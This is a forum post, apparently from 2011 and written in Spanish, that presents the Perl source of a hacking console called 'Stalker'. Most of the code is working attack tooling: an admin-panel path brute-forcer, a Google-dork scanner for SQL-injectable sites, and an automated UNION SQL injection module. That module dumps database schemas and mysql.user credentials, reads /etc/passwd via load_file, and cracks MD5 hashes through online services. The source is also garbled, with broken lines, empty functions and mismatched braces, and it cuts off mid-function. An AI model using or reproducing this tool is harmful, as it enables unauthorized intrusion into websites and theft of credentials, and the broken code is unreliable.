Bueno aca les traigo un programa que eh estado
haciendo esta ultima semana
Se llama stalker , sirve como consola en caso de que cmd.exe no este
disponible y tiene las siguiente funciones
- Mostrar IP de servidor especifico
- Capturar todos los links de una pagina
- Recibir procesos de nuestra maquina
- Cerrar el proceso que nos moleste
- Conectar a un servidor y mostrar respuesta
- Capturar metodos HTTP de un servidor web
- Verificar listado de directorios en una pagina
- Codificacion y decodificacion de hex/ascii/base64
- Escanear puertos de una IP
- Buscar panel de administracion
- Crackear hash md5 mediante webs
- Buscar en google paginas vulnerables a SQLI
- Cliente FTP
- Navegador por nuestros archivos y directorios
- Y ejecutar comandos
#!usr/bin/perl
#Project STALKER (C) Doddy Hackman 2011
#
#ppm install http://www.bribes.org/perl/ppm/DBI.ppd
#ppm install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd
#
#You need download this http://search.cpan.org/~animator/Color-Output-1.05/Output.pm
#
use IO::Socket;
use HTML::LinkExtor;
use LWP::UserAgent;
use Win32::Process;
use Net::FTP;
use Cwd;
use URI
::Split qw(uri_split
); use MIME::Base64;
use DBI;
use Color::Output;
Color::Output::Init
@panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
,'administration/','administration/index.php','administration/login.php'
,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
,'system/login.php','admin.php','login.php','administrador.php','administration.php'
,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
,'administrator/','administrator/index.html','administrator/login.html'
,'administrator/account.html','administrator/account.php','administrator.html','login.html'
,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
,'administrator/login.asp','administrator/account.asp','administrator.asp'
,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/
','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/
','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/
','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/
','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
,'server/','database_administration/','power_user/','system_administration/'
,'ss_vms_admin_sm/');
unless (-d "/logs/webs") {
}
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);
head();
getinfo();
$SIG{INT} = \&next;
while(1) {
cprint "\x037"; #13
menujo();
cprint "\x030";
}
sub getinfo {
$so = $^O;
$login = Win32::LoginName();
$domain = Win32::DomainName();
cprint "\x0313"; #13
print "\n\n[SO] : $so [Login] : $login [Group] : $domain\n\n"; cprint "\x030";
}
sub menujo {
chomp (my $cmd = <stdin>);
if ($cmd=~/getinfo/ig) {
getinfo();
}
elsif ($cmd =~/getip (.*)/) {
my $te = $1;
if ($te eq "" or $te eq " ") {
print "\n[+] sintax : getip <host>\n"; }
print "\n[IP] : ".getip
($1)."\n"; }
elsif ($cmd =~/getlink (.*)/) {
print "[+] Extracting links in the page\n\n\n"; $code = toma($1);
my @re = get_links($code);
for my $url(@re) {
}
print "\n\n[+] Finish\n"; }
elsif ($cmd=~/help/) {
helpme();
}
elsif ($cmd=~/getprocess/) {
my %re = getprocess();
($proceso,$pid) = ($t=~/(.*):(.*)/ig);
print "[+] Proceso : ".$data."\n"; print "[+] PID : ".$re{$data}."\n\n"; }
}
elsif ($cmd=~/killprocess (.*) (.*)/) {
if (killprocess($1,$2)) {
print "[+] Process $1 closed"; }
}
elsif ($cmd=~/conec (.*) (.*) (.*)/) {
print conectar
($1,$2,$3); }
elsif ($cmd=~/allow (.*)/) {
$re = conectar($1,"80","GET / HTTP/1.0\r\n");
if ($re=~/Allow:(.*)/ig) {
print "[+] Metodos : ".$1."\n"; }}
elsif ($cmd=~/paths (.*)/) {
scanpaths($1);
}
elsif ($cmd=~/encodehex (.*)/) {
print "\n\n[+] ".hex_en
($1)."\n\n"; }
elsif ($cmd=~/decodehex (.*)/) {
print "\n\n[+] ".hex_de
($1)."\n\n"; }
elsif ($cmd=~/download (.*) (.*)/) {
my $file,$name = $1,$2;
if (download($1,$2)) {
print "[+] File downloaded\n"; }
}
elsif ($cmd=~/encodeascii (.*)/) {
print "\n\n[+] ".ascii
($1)."\n\n"; }
elsif ($cmd=~/decodeascii (.*)/) {
print "\n\n[+] ".ascii_de
($1)."\n\n"; }
elsif ($cmd=~/encodebase (.*)/) {
print "\n\n[+] ".base
($1)."\n\n"; }
elsif ($cmd=~/decodebase (.*)/) {
print "\n\n[+] ".base_de
($1)."\n\n"; }
elsif ($cmd=~/aboutme/) {
aboutme();
}
elsif ($cmd=~/scanport (.*)/) {
scanport($1);
}
elsif ($cmd=~/panel (.*)/) {
scanpanel($1);
}
elsif ($cmd=~/scangoogle/) {
chomp(my $dork = <stdin>); chomp(my $pages = <stdin>); print "\n\n[Starting the search]\n\n"; my @links = google($dork,$pages);
print "\n[Links Found] : ".int(@links)."\n\n\n"; print "[Starting the scan]\n\n\n"; for my $link(@links) {
if ($link=~/(.*)=/ig) {
my $web = $1;
sql($web."=");
}}
print "\n\n[+] Finish\n"; }
elsif ($cmd=~/getpass (.*)/) {
crackit($1);
}
elsif ($cmd=~/ftp (.*) (.*) (.*)/) {
ftp($1,$2,$3);
}
elsif ($cmd=~/navegator/) {
nave:
chomp(my $rta = <stdin>); if ($rta=~/list/) {
my @files = coleccionar(getcwd());
for(@files) {
if (-f $_) {
print "[File] : ".$_."\n"; } else {
print "[Directory] : ".$_."\n"; }}}
if ($rta=~/cd (.*)/) {
my $dir = $1;
print "\n[+] Directory changed\n"; } else {
}}
if ($rta=~/del (.*)/) {
my $file = getcwd()."/".$1;
if (-f $file) {
print "\n[+] File Deleted\n"; } else {
}
} else {
print "\n[+] Directory Deleted\n"; } else {
}}}
if ($rta=~/rename (.*) (.*)/) { if (rename(getcwd
()."/".$1,getcwd
()."/".$2)) { print "\n[+] File Changed\n"; } else {
}}
my $file = $1;
#system(getcwd()."/".$file);
}
if ($rta=~/help/) {
print "\nCommands : help cd list del rename open exit\n\n"; }
next;
}
}
elsif ($cmd=~/kobra (.*)/) {
my $url = $1;
scansqli($url,"--");
}
elsif ($cmd=~/mysql (.*) (.*) (.*)/) {
enter($1,$2,$3);
}
copyright();
<stdin>;
}
else {
}
#print "\n\n";
}
sub scansqli {
print "[Status] : Scanning.....\n"; $pass = &bypass($_[1]);
my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]);
my $save = $auth;
if ($_[0]=~/hackman/ig) {
savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
&menu_options($_[0],$pass,$save);
}
my ($gen,$save,$control) = &length($_[0],$_[1]);
if ($control eq 1) {
print "[Status] : Enjoy the menu\n\n"; &menu_options($gen,$pass,$save);
} else {
print "[Status] : Length columns not found\n\n"; menujo();
}
}
my $rows = "0";
my $asc;
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);
$inyection = $page.$pass1."and".$pass1."1=0".$pass1."order".$pass1."by".$pass1."9999999999".$pass2;
$code = toma($inyection);
if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/unknown column/ig || $code=~/Call to undefined function/ig) {
my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2);
my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2);
unless ($testar1 eq $testar2) {
my $patha = $1;
$alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
$total = "1";
for my $rows(2..200) {
$asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
$total.= ",".$rows;
$injection = $page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
$test = toma($injection);
if ($test=~/RATSXPDOWN/) {
@number = $test =~m{RATSXPDOWN
(\d+)RATSXPDOWN
}g
; $control = 1;
my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]);
my $save = $auth;
savefile($save.".txt","\n[Target confirmed] : $page");
savefile($save.".txt","[Bypass] : $_[1]\n");
savefile($save.".txt","[Limit] : The site has $rows columns");
savefile($save.".txt","[Data] : The number @number print data");
if ($patha) {
savefile($save.".txt","[Full Path Discloure] : $patha");
}
$total=~s/$number[0]/hackman
/; savefile($save.".txt","[SQLI] : ".$page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
return($page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control); }}}}}
sub details {
my ($page,$bypass,$save) = @_;
($pass1,$pass2) = &bypass($bypass);
savefile($save.".txt","\n");
if ($page=~/(.*)hackman(.*)/ig) {
print "\n\n[+] Searching information..\n\n"; my ($start,$end) = ($1,$2);
$inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
$mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
$test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
$test1 = toma($inforschema);
$test2 = toma($mysqluser);
if ($test2=~/ERTOR854/ig) {
savefile($save.".txt","[mysql.user] : ON");
print "[mysql.user] : ON\n"; } else {
print "[mysql.user] : OFF\n"; savefile($save.".txt","[mysql.user] : OFF");
}
if ($test1=~/ERTOR854/ig) {
print "[information_schema.tables] : ON\n"; savefile($save.".txt","[information_schema.tables] : ON");
} else {
print "[information_schema.tables] : OFF\n"; savefile($save.".txt","[information_schema.tables] : OFF");
}
if ($test3=~/ERTOR854/ig) {
print "[+] load_file permite ver los archivos\n"; savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
}
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
$injection = $start.$concat.$end.$pass2;
$code = toma($injection);
if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n"; savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
} else {
print "\n[-] Not found any data\n"; }}}
sub menu_options {
my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]);
my $save = $auth;
print "\n/logs/webs/$save>"; chomp (my $rta = <stdin>);
if ($rta=~/help/) {
commands : details tables columns dbs othertable othercolumn
mysqluser dumper logs
exit
);
}
if ($rta =~/tables/) {
schematables($_[0],$_[1],$save);
&reload;
}
elsif ($rta =~/columns (.*)/) {
my $tabla = $1;
schemacolumns($_[0],$_[1],$save,$tabla);
&reload;
}
elsif ($rta =~/dbs/) {
&schemadb($_[0],$_[1],$save);
&reload;
}
elsif ($rta =~/othertable (.*)/) {
my $data = $1;
&schematablesdb($_[0],$_[1],$data,$save);
&reload;
}
elsif ($rta =~/othercolumn (.*) (.*)/){
my ($db,$table) = ($1,$2);
&schemacolumnsdb($_[0],$_[1],$db,$table,$save);
&reload;
}
elsif ($rta =~/mysqluser/) {
&mysqluser($_[0],$_[1],$save);
&reload;
}
elsif ($rta=~/logs/) {
$t = "logs/webs/$save.txt";
&reload;
}
next;
}
elsif ($rta=~/dumper (.*) (.*) (.*)/) {
my ($tabla,$col1,$col2) = ($1,$2,$3);
&dump($_[0],$col1,$col2,$tabla,$_[1],$save);
&reload;
}
elsif ($rta =~/details/) {
&details($_[0],$_[1],$save);
&reload;
}
else {
&reload;
}
}
sub schematables {
$real = "1";
my ($page,$bypass,$save) = @_;
savefile($save.".txt","\n");
my $page1 = $page;
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","[DB] : default");
print "\n[+] Searching tables with schema\n\n"; $page =~s/hackman
/unhex
(hex(concat
(char
(82,65,84,83,88,80,68,79,87,78,49),table_name
,char
(82,65,84,83,88,80,68,79,87,78,49))))/; $page1=~s/hackman
/unhex
(hex(concat
(char
(82,65,84,83,88,80,68,79,87,78,49),Count
(*),char
(82,65,84,83,88,80,68,79,87,78,49))))/; $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $resto = $1;
$total = $resto - 17;
print "[+] Tables Length : $total\n\n"; savefile($save.".txt","[+] Searching tables with schema\n");
savefile($save.".txt","[+] Tables Length : $total\n");
my $limit = $1;
for my $limit(17..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
print "[Table $real Found : $table ]\n"; savefile($save.".txt","[Table $real Found : $table ]");
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n"; }
}
sub reload {
&menu_options($_[0]);
}
sub schemacolumns {
my ($page,$bypass,$save,$table) = @_;
my $page3 = $page;
my $page4 = $page;
savefile($save.".txt","\n");
($pass1,$pass2) = &bypass($bypass);
print "\n[DB] : default\n"; savefile($save.".txt","[DB] : default");
savefile($save.".txt","[Table] : $table\n");
$page3=~s/hackman
/unhex
(hex(concat
(char
(82,65,84,83,88,80,68,79,87,78,49),Count
(*),char
(82,65,84,83,88,80,68,79,87,78,49))))/; $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns Length : $1 ]\n\n"; savefile($save.".txt","[Columns Length : $1 ]\n");
my $si = $1;
$page4=~s/hackman
/unhex
(hex(concat
(char
(82,65,84,83,88,80,68,79,87,78,49),column_name
,char
(82,65,84,83,88,80,68,79,87,78,49))))/; $real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "[Column $real] : $1\n"; savefile($save.".txt","[Column $real] : $1");
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n"; }}
sub schemadb {
my ($page,$bypass,$save) = @_;
my $page1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Searching DBS\n\n"; ($pass1,$pass2) = &bypass($bypass);
$page=~s/hackman
/unhex
(hex(concat
(char
(82,65,84,83,88,80,68,79,87,78,49),Count
(*),char
(82,65,84,83,88,80,68,79,87,78,49))))/; $code = toma($page.$pass1."from".$pass1."information_schema.schemata");
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $limita = $1;
print "[+] Databases Length : $limita\n\n"; savefile($save.".txt","[+] Databases Length : $limita\n");
$page1=~s/hackman
/unhex
(hex(concat
(char
(82,65,84,83,88,80,68,79,87,78,49),schema_name
,char
(82,65,84,83,88,80,68,79,87,78,49))))/; $real = "1";
for my $limit(0..$limita) {
$code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $control = $1;
if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
print "[Database $real Found] $control\n"; savefile($save.".txt","[Database $real Found] : $control");
$real++;
}
}
}
} else {
print "[-] information_schema = ERROR\n"; }
}
sub schematablesdb {
my $page = $_[0];
my $db = $_[2];
my $page1 = $page;
savefile($_[3].".txt","\n");
print "\n\n[+] Searching tables with DB $db\n\n"; ($pass1,$pass2) = &bypass($_[1]);
savefile($_[3].".txt","[DB] : $db");
$page =~s/hackman
/unhex
(hex(concat
(char
(82,65,84,83,88,80,68,79,87,78,49),table_name
,char
(82,65,84,83,88,80,68,79,87,78,49))))/; $page1=~s/hackman
/unhex
(hex(concat
(char
(82,65,84,83,88,80,68,79,87,78,49),Count
(*),char
(82,65,84,83,88,80,68,79,87,78,49))))/; $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "[+] Tables Length : $1\n\n"; savefile($_[3].".txt","[+] Tables Length : $1\n");
my $limit = $1;
$real = "1";
for my $lim(0..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
savefile($_[3].".txt","[Table $real Found : $table ]");
print "[Table $real Found : $table ]\n"; $real++;
}}
} else {
print "\n[-] information_schema = ERROR\n"; }}
sub schemacolumnsdb {
my ($page,$bypass,$db,$table,$save) = @_;
my $page3 = $page;
my $page4 = $page;
print "\n\n[+] Searching columns in table $table with DB $db\n\n"; savefile($save.".txt","\n");
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","\n[DB] : $db");
savefile($save.".txt","[Table] : $table");
$page3=~s/hackman
/unhex
(hex(concat
(char
(82,65,84,83,88,80,68,79,87,78,49),Count
(*),char
(82,65,84,83,88,80,68,79,87,78,49))))/; $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns length : $1 ]\n\n"; savefile($save.".txt","[Columns length : $1 ]\n");
my $si = $1;
$page4=~s/hackman
/unhex
(hex(concat
(char
(82,65,84,83,88,80,68,79,87,78,49),column_name
,char
(82,65,84,83,88,80,68,79,87,78,49))))/; $real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "[Column $real] : $1\n"; savefile($save.".txt","[Column $real] : $1");
$real++;
}
}
} else {
print "\n[-] information_schema = ERROR\n"; }
}
sub mysqluser {
my ($page,$bypass,$save) = @_;
my $cop = $page;
my $cop1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Finding mysql.users\n"; ($pass1,$pass2) = &bypass($bypass);
$page =~s/hackman
/concat
(char
(82,65,84,83,88,80,68,79,87,78,49))/; $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
if ($code=~/RATSXPDOWN/ig){
$cop1 =~s/hackman
/unhex
(hex(concat
(char
(82,65,84,83,88,80,68,79,87,78,49),Count
(*),char
(82,65,84,83,88,80,68,79,87,78,49))))/; $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[+] Users Found : $1\n\n"; savefile($save.".txt","\n[+] Users mysql Found : $1\n");
for my $limit(0..$1) {
$cop =~s/hackman
/unhex
(hex(concat
(0x524154535850444f574e
,Host
,0x524154535850444f574e
,User
,0x524154535850444f574e
,Password
,0x524154535850444f574e
)))/; $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
print "[Host] : $1 [User] : $2 [Password] : $3\n"; savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
} else {
&reload;
}
}
}
} else {
print "\n[-] mysql.user = ERROR\n\n"; }
}
savefile($_[5].".txt","\n");
my $page = $_[0];
($pass1,$pass2) = &bypass($_[4]);
if ($page=~/(.*)hackman(.*)/){
my $start = $1;
my $end = $2;
print "\n\n[+] Extracting values...\n\n"; $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
$val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
$tota = $1;
print "[+] Table : $_[3]\n"; print "[+] Length of the rows : $tota\n\n"; print "[$_[1]] [$_[2]]\n\n"; savefile($_[5].".txt","[Table] : $_[3]");
savefile($_[5].".txt","[+] Length of the rows: $tota\n");
savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
for my $limit(0..$tota) {
$injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
savefile($_[5].".txt","[$_[1]] : $1 [$_[2]] : $2");
print "[$_[1]] : $1 [$_[2]] : $2\n"; } else {
print "\n\n[+] Extracting Finish\n\n"; &reload;
}
}
} else {
print "[-] Not Found any DATA\n\n"; }}}
sub bypass {
if ($_[0] eq "/*") { return ("/**/","/*"); } elsif ($_[0] eq "%20") { return ("%20","%00"); }
sub ascii {
}
sub base {
$re = encode_base64($_[0]);
}
sub base_de {
$re = decode_base64($_[0]);
}
sub download {
if ($nave->mirror($_[0],$_[1])) {
if (-f $_[1]) {
}}}
sub hex_en {
my $string = $_[0];
$hex = '0x';
}
}
sub hex_de {
$text =~ s/^0x//;
}
sub ascii_de {
}
sub getprocess {
my %procesos;
my $uno = Win32::OLE->new("WbemScripting.SWbemLocator");
my $dos = $uno->ConnectServer("","root\\cimv2");
foreach my $pro (in $dos->InstancesOf("Win32_Process")){
$procesos{$pro->{Caption}} = $pro->{ProcessId};
}
}
sub killprocess {
my ($numb,$pid) = @_;
if (Win32::Process::KillProcess($pid,$numb)) {
} else {
}
}
sub getip {
}
sub crackit {
my $secret = $_[0];
print "[+] Cracking $_[0]\n\n";
my %hash = (
'http://passcracking.com/' => {
'tipo' => 'post',
'variables'=>'{"datafromuser" => $_[0], "submit" => "DoIT"}',
'regex'=>'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
},
'http://md5.hashcracking.com/search.php?md5=' => {
'tipo' => 'get',
'regex' => 'Cleartext of $_[0] is (.*)',
},
'http://www.bigtrapeze.com/md5/' => {
'tipo' => 'post',
'variables'=>'{"query" => $_[0], "submit" => " Crack "}',
'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
},
'http://opencrack.hashkiller.com/' => {
'tipo' => 'post',
'variables'=>'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
'regex' => qq(<\
/div
><div class
="result">$_[0]:(.+)<br\
/>), },
'http://www.hashchecker.com/index.php?_sls=search_hash' => {
'tipo' => 'post',
'variables'=>'{"search_field" => $_[0], "Submit" => "search"}',
'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
},
'http://victorov.su/md5/?md5e=&md5d=' => {
'tipo' => 'get',
'regex' => qq(MD5 ðàñøèôðîâàí
: <b>(.*)<\
/b
><br><form action
=\
"\">), }
);
for my $data(keys %hash) {
if ($hash{$data}{tipo} eq "get") {
$code = toma($data.$_[0]);
if ($code=~/$hash{$data}{regex}/ig) {
print "\n[+] Decoded : ".$1."\n\n";
saveyes("logs/pass-found.txt",$secret.":".$1);
}
} else {
$code = tomar($data,$hash{$data}{variables});
if ($code=~/$hash{$data}{regex}/ig) {
saveyes("logs/pass-found.txt",$secret.":".$1);
}
}
}
print "\n[+] Finish\n";
}
sub ftp {
my ($ftp,$user,$pass) = @_;
if (my $socket = Net::FTP->new($ftp)) {
if ($socket->login($user,$pass)) {
print "\n[+] Enter of the server FTP\n\n";
menu:
print "\n\nftp>";
chomp (my $cmd = <stdin>);
print "\n\n";
if ($cmd=~/help/) {
print q(
help : show information
cd : change directory <dir>
dir : list a directory
mdkdir : create a directory <dir>
rmdir : delete a directory <dir>
pwd : directory
del : delete a file <file>
rename : change name of the a file <file1> <file2>
size : size of the a file <file>
put : upload a file <file>
get : download a file <file>
cdup : change dir <dir>
exit : ??
);
}
if ($cmd=~/dir/ig) {
if (my @files = $socket->dir()) {
for(@files) {
print "[+] ".$_."\n";
}
} else {
print "\n\n[-] Error\n\n";
}
}
if ($cmd=~/pwd/ig) {
print "[+] Path : ".$socket->pwd()."\n";
}
if ($cmd=~/cd (.*)/ig) {
if ($socket->cwd($1)) {
print "[+] Directory changed\n";
} else {
print "\n\n[-] Error\n\n";
}
}
if ($cmd=~/cdup/ig) {
if (my $dir = $socket->cdup()) {
print "\n\n[+] Directory changed\n\n";
} else {
print "\n\n[-] Error\n\n";
}
}
if ($cmd=~/del (.*)/ig) {
if ($socket->delete($1)) {
print "[+] File deleted\n";
} else {
print "\n\n[-] Error\n\n";
}
}
if ($cmd=~/rename (.*) (.*)/ig) {
if ($socket->rename($1,$2)) {
print "[+] File Updated\n";
} else {
print "\n\n[-] Error\n\n";
}
}
if ($cmd=~/mkdir (.*)/ig) {
if ($socket->mkdir($1)) {
print "\n\n[+] Directory created\n";
} else {
print "\n\n[-] Error\n\n";
}
}
if ($cmd=~/rmdir (.*)/ig) {
if ($socket->rmdir($1)) {
print "\n\n[+] Directory deleted\n";
} else {
print "\n\n[-] Error\n\n";
}
}
if ($cmd=~/exit/ig) {
next;
}
if ($cmd=~/get (.*) (.*)/ig) {
print "\n\n[+] Downloading file\n\n";
if ($socket->get($1,$2)) {
print "[+] Download completed";
} else {
print "\n\n[-] Error\n\n";
}
}
if ($cmd=~/put (.*) (.*)/ig) {
print "\n\n[+] Uploading file\n\n";
if ($socket->put($1,$2)) {
print "[+] Upload completed";
} else {
print "\n\n[-] Error\n\n";
}
}
if ($cmd=~/quit/) {
next;
}
goto menu;
} else {
